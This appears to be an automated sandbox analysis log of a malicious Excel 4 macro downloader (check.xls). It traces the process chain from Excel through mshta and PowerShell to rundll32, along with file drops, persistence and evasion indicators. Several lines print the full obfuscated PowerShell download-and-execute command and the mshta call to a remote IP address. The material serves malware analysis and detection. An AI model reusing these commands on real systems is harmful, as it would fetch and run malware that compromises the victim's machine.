Source: C:\Users\user\Desktop\check.xls, type: DROPPED Matched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Vynkcaqowyax\ Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10032B38 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100201F1 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100200FD appears 72 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D27 appears 288 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1001F9FC appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D5A appears 82 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100359C1 appears 46 times
Source: check.xls OLE indicator, VBA macros: true
Source: check.xls.0.dr OLE indicator, VBA macros: true
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Documents\ssd.dll Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@29/9@1/47
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: check.xls OLE indicator, Workbook stream: true
Source: check.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc, 9_2_100125C0
Source: check.xls ReversingLabs: Detection: 37%
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K........p............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................&.k....................................}..v.....q......0...............................`............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................&.k..... ..............................}..v.... r......0.................p.............`............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................'.k....................................}..v....X~......0...............................`............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................'.k......p.............................}..v.....~......0...............(.p.............`............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#...............B$.k....................................}..v............0...............................`............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#...............B$.k....X.p.............................}..v............0.................p.............`............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....'................?.k....E...............................}..v....PN......0.................p.............`............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+................?.k....E...............................}..v............0.................p.............`............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0...............h.......:.......`............... Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c mshta http://91.240.118.168/zzx/ccv/fe.html
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/zzx/ccv/fe.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vynkcaqowyax\awlbpzydkj.dai",eCIlnBbopQsHZ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vynkcaqowyax\awlbpzydkj.dai",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Nbcvytvfdctpr\ypizexh.jni",DTzZcwBzvukLX
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Nbcvytvfdctpr\ypizexh.jni",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ditxkaqsfgmceab\rvapdmavyfv.jgp",XhTgIPP
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ditxkaqsfgmceab\rvapdmavyfv.jgp",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qnjqx\xohsny.wba",zykxfMjqzK
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qnjqx\xohsny.wba",DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c mshta http://91.240.118.168/zzx/ccv/fe.html Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/zzx/ccv/fe.html Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vynkcaqowyax\awlbpzydkj.dai",eCIlnBbopQsHZ Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vynkcaqowyax\awlbpzydkj.dai",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Nbcvytvfdctpr\ypizexh.jni",DTzZcwBzvukLX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Nbcvytvfdctpr\ypizexh.jni",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ditxkaqsfgmceab\rvapdmavyfv.jgp",XhTgIPP Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ditxkaqsfgmceab\rvapdmavyfv.jgp",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qnjqx\xohsny.wba",zykxfMjqzK Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qnjqx\xohsny.wba",DllRegisterServer Jump to behavior
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC6B7.tmp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: 27FA.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation

barindex
Source: C:\Windows\System32\mshta.exe Code function: 4_3_036A00C6 push 8B4902C6h; iretd 4_3_036A00CC
Source: C:\Windows\System32\mshta.exe Code function: 4_3_036A08C7 push 8B4902C6h; iretd 4_3_036A08CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10032B7D push ecx; ret 9_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030DFF push ecx; ret 9_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10032B7D push ecx; ret 11_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030DFF push ecx; ret 11_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
Source: ssd.dll.6.dr Static PE information: real checksum: 0x8df98 should be: 0x920d5

Persistence and Installation Behavior

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Documents\ssd.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Vynkcaqowyax\awlbpzydkj.dai (copy) Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Vynkcaqowyax\awlbpzydkj.dai (copy) Jump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Vynkcaqowyax\awlbpzydkj.dai:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Nbcvytvfdctpr\ypizexh.jni:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ditxkaqsfgmceab\rvapdmavyfv.jgp:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Qnjqx\xohsny.wba:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100134F0 IsIconic, 9_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 9_2_10018C9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100134F0 IsIconic, 11_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 11_2_10018C9A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\mshta.exe TID: 2696 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
